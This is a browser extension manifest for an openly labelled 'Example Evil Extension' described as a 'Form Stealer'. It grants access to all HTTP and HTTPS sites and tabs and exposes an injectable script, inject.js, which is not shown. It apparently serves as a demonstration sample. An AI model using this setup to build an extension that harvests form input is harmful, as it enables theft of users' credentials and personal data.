{
  "name": "Example Evil Extension",
  "version": "0.0.1",
  "manifest_version": 2,
  "description": "Form Stealer",
  "homepage_url": "http://rt-kt.github.io",
  "background": {
    "scripts": [
      "background.js"
    ],
    "persistent": true
  },
  "browser_action": {
    "default_title": "Inject!"
  },
  "permissions": [
    "https://*/*",
    "http://*/*",
    "tabs"
  ],
  "web_accessible_resources": ["inject.js"]
}